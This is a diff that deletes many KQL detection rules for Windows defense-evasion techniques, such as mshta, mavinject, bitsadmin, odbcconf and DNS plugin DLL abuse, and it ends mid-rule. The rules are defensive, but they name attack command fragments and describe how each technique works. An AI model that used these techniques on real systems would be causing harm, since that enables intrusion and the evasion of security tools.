diff --git a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql
deleted file mode 100644
index a4536f33..00000000
--- a/Defense Evasion/Lolbin_Ssh.exe_Use_As_Proxy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "ssh.exe" binary as a proxy to launch other programs
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenSSH\\sshd.exe" or ((ProcessCommandLine contains "ProxyCommand=" or (ProcessCommandLine contains "PermitLocalCommand" and ProcessCommandLine contains "LocalCommand")) and FolderPath endswith "\\ssh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql b/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql
deleted file mode 100644
index 2dc54c90..00000000
--- a/Defense Evasion/Lolbin_Unregmp2.exe_Use_As_Proxy.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/29
-// Level: medium
-// Description: Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /HideWMP" and (FolderPath endswith "\\unregmp2.exe" or ProcessVersionInfoOriginalFileName =~ "unregmp2.exe")
\ No newline at end of file
diff --git a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql b/Defense Evasion/MSHTA_Suspicious_Execution_01.kql
deleted file mode 100644
index 280ba986..00000000
--- a/Defense Evasion/MSHTA_Suspicious_Execution_01.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)
-// Date: 2019/02/22
-// Level: high
-// Description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism
-// Tags: attack.defense_evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020.1599
-DeviceProcessEvents
-| where (ProcessCommandLine contains "vbscript" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains ".dll") and FolderPath endswith "\\mshta.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql b/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql
deleted file mode 100644
index b3590a9b..00000000
--- a/Defense Evasion/Macro_Enabled_In_A_Potentially_Suspicious_Document.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects registry changes to Office trust records where the path is located in a potentially suspicious location
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "/AppData/Local/Microsoft/Windows/INetCache/" or RegistryKey contains "/AppData/Local/Temp/" or RegistryKey contains "/PerfLogs/" or RegistryKey contains "C:/Users/Public/" or RegistryKey contains "file:///D:/" or RegistryKey contains "file:///E:/") and RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql b/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
deleted file mode 100644
index a55dc381..00000000
--- a/Defense Evasion/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/08/12
-// Level: high
-// Description: Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
-Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath contains "iphlpapi.dll" and FolderPath contains "\\AppData\\Local\\Microsoft"
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql b/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql
deleted file mode 100644
index 96432dcf..00000000
--- a/Defense Evasion/Malicious_PE_Execution_by_Microsoft_Visual_Studio_Debugger.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
-// Date: 2020/10/14
-// Level: medium
-// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
-This option may be used adversaries to execute malicious code by signed verified binary.
-The debugger is installed alongside with Microsoft Visual Studio package.
-
-// Tags: attack.t1218, attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql b/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql
deleted file mode 100644
index a7baffeb..00000000
--- a/Defense Evasion/Malicious_Windows_Script_Components_File_Execution_by_TAEF_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/13
-// Level: low
-// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
-Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql b/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql
deleted file mode 100644
index 2be19bac..00000000
--- a/Defense Evasion/Mavinject_Inject_DLL_Into_Running_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2021/07/12
-// Level: high
-// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql b/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql
deleted file mode 100644
index 894acf23..00000000
--- a/Defense Evasion/MaxMpxCt_Registry_Value_Changed.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/03/19
-// Level: low
-// Description: Detects changes to the "MaxMpxCt" registry value.
-MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.
-Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
-
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\LanmanServer\\Parameters\\MaxMpxCt"
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql b/Defense Evasion/Microsoft_Office_DLL_Sideload.kql
deleted file mode 100644
index 7003f77d..00000000
--- a/Defense Evasion/Microsoft_Office_DLL_Sideload.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: high
-// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql b/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql
deleted file mode 100644
index f541d3c2..00000000
--- a/Defense Evasion/Microsoft_Office_Protected_View_Disabled.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/06/08
-// Level: high
-// Description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Office" and RegistryKey contains "\\Security\\ProtectedView") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\enabledatabasefileprotectedview" or RegistryKey endswith "\\enableforeigntextfileprotectedview")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAttachementsInPV" or RegistryKey endswith "\\DisableInternetFilesInPV" or RegistryKey endswith "\\DisableIntranetCheck" or RegistryKey endswith "\\DisableUnsafeLocationsInPV")))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
deleted file mode 100644
index 49fbaa43..00000000
--- a/Defense Evasion/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql b/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql
deleted file mode 100644
index fc3958d8..00000000
--- a/Defense Evasion/Microsoft_Workflow_Compiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, frack113
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Modification_of_IE_Registry_Settings.kql b/Defense Evasion/Modification_of_IE_Registry_Settings.kql
deleted file mode 100644
index b0b1e710..00000000
--- a/Defense Evasion/Modification_of_IE_Registry_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: low
-// Description: Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" and (not((RegistryKey contains "\\Accepted Documents" or RegistryValueData =~ "Binary Data" or RegistryValueData startswith "DWORD" or (RegistryValueData in~ ("Cookie:", "Visited:", "(Empty)")) or (RegistryKey contains "\\Cache" or RegistryKey contains "\\ZoneMap" or RegistryKey contains "\\WpadDecision"))))
\ No newline at end of file
diff --git a/Defense Evasion/Modify_Group_Policy_Settings.kql b/Defense Evasion/Modify_Group_Policy_Settings.kql
deleted file mode 100644
index 45d1feba..00000000
--- a/Defense Evasion/Modify_Group_Policy_Settings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1484.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql b/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql
deleted file mode 100644
index 0c15a4a8..00000000
--- a/Defense Evasion/Monitoring_For_Persistence_Via_BITS.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/10/29
-// Level: medium
-// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
-When the job runs on the system the command specified in the BITS job will be executed.
-This can be abused by actors to create a backdoor within the system and for persistence.
-It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
-
-// Tags: attack.defense_evasion, attack.t1197
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
deleted file mode 100644
index 3f152c7d..00000000
--- a/Defense Evasion/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/Defense Evasion/MsiExec_Web_Install.kql b/Defense Evasion/MsiExec_Web_Install.kql
deleted file mode 100644
index 15d8a634..00000000
--- a/Defense Evasion/MsiExec_Web_Install.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/02/09
-// Level: medium
-// Description: Detects suspicious msiexec process starts with web addresses as parameter
-// Tags: attack.defense_evasion, attack.t1218.007, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains " msiexec" and ProcessCommandLine contains "://"
\ No newline at end of file
diff --git a/Defense Evasion/Msiexec_Quiet_Installation.kql b/Defense Evasion/Msiexec_Quiet_Installation.kql
deleted file mode 100644
index e47c0886..00000000
--- a/Defense Evasion/Msiexec_Quiet_Installation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
-
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-i" or ProcessCommandLine contains "/i" or ProcessCommandLine contains "-package" or ProcessCommandLine contains "/package" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/a" or ProcessCommandLine contains "-j" or ProcessCommandLine contains "/j") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "msiexec.exe") and (ProcessCommandLine contains "-q" or ProcessCommandLine contains "/q")) and (not(((ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath =~ "C:\\Windows\\CCM\\Ccm32BitLauncher.exe") or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Msxsl.EXE_Execution.kql b/Defense Evasion/Msxsl.EXE_Execution.kql
deleted file mode 100644
index 5adad169..00000000
--- a/Defense Evasion/Msxsl.EXE_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Timur Zinniatullin, oscd.community
-// Date: 2019/10/21
-// Level: medium
-// Description: Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.
-Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
-
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql b/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql
deleted file mode 100644
index fd8baf44..00000000
--- a/Defense Evasion/NET_NGenAssemblyUsageLog_Registry_Key_Tamper.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/11/18
-// Level: high
-// Description: Detects changes to the NGenAssemblyUsageLog registry key.
-.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
-By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "SOFTWARE\\Microsoft\\.NETFramework\\NGenAssemblyUsageLog"
\ No newline at end of file
diff --git a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql b/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql
deleted file mode 100644
index 016f8720..00000000
--- a/Defense Evasion/NetNTLM_Downgrade_Attack_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), wagga
-// Date: 2018/03/20
-// Level: high
-// Description: Detects NetNTLM downgrade attack
-// Tags: attack.defense_evasion, attack.t1562.001, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "SYSTEM" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (RegistryKey endswith "\\lmcompatibilitylevel" or RegistryKey endswith "\\NtlmMinClientSec" or RegistryKey endswith "\\RestrictSendingNTLMTraffic")
\ No newline at end of file
diff --git a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql b/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql
deleted file mode 100644
index fa2fb1a9..00000000
--- a/Defense Evasion/Netsh_Allow_Group_Policy_on_Microsoft_Defender_Firewall.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "rule" and ProcessCommandLine contains "group=" and ProcessCommandLine contains "new" and ProcessCommandLine contains "enable=Yes") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql
deleted file mode 100644
index 36f8079b..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_AddinUtil.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
-This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql
deleted file mode 100644
index fece3237..00000000
--- a/Defense Evasion/Network_Connection_Initiated_By_Regsvr32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql
deleted file mode 100644
index 8e765072..00000000
--- a/Defense Evasion/Network_Connection_Initiated_Via_Notepad.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql
deleted file mode 100644
index 1b6b673e..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_DB_Path_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Software\\Winternals\\BGInfo\\Database"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql
deleted file mode 100644
index ec618a77..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_VBScript_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "4" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql b/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql
deleted file mode 100644
index 24312dbc..00000000
--- a/Defense Evasion/New_BgInfo.EXE_Custom_WMI_Query_Registry_Configuration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: medium
-// Description: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe"
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData startswith "6" and ActionType =~ "RegistryValueSet" and RegistryKey contains "\\Software\\Winternals\\BGInfo\\UserFields"
\ No newline at end of file
diff --git a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql
deleted file mode 100644
index bc970aa2..00000000
--- a/Defense Evasion/New_DLL_Registered_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql
deleted file mode 100644
index 1fa50c1c..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\services\\DNS\\Parameters\\ServerLevelPluginDll"
\ No newline at end of file
diff --git a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql b/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 13f2830a..00000000
--- a/Defense Evasion/New_DNS_ServerLevelPluginDll_Installed_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/05/08
-// Level: high
-// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Defense Evasion/New_File_Association_Using_Exefile.kql b/Defense Evasion/New_File_Association_Using_Exefile.kql
deleted file mode 100644
index 51ab4c8a..00000000
--- a/Defense Evasion/New_File_Association_Using_Exefile.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/11/19
-// Level: high
-// Description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "exefile" and RegistryKey contains "Classes\\."
\ No newline at end of file
diff --git a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql b/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 0e1275cd..00000000
--- a/Defense Evasion/New_Firewall_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Sander Wiebing
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the addition of a new rule to the Windows firewall via netsh
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0246
-DeviceProcessEvents
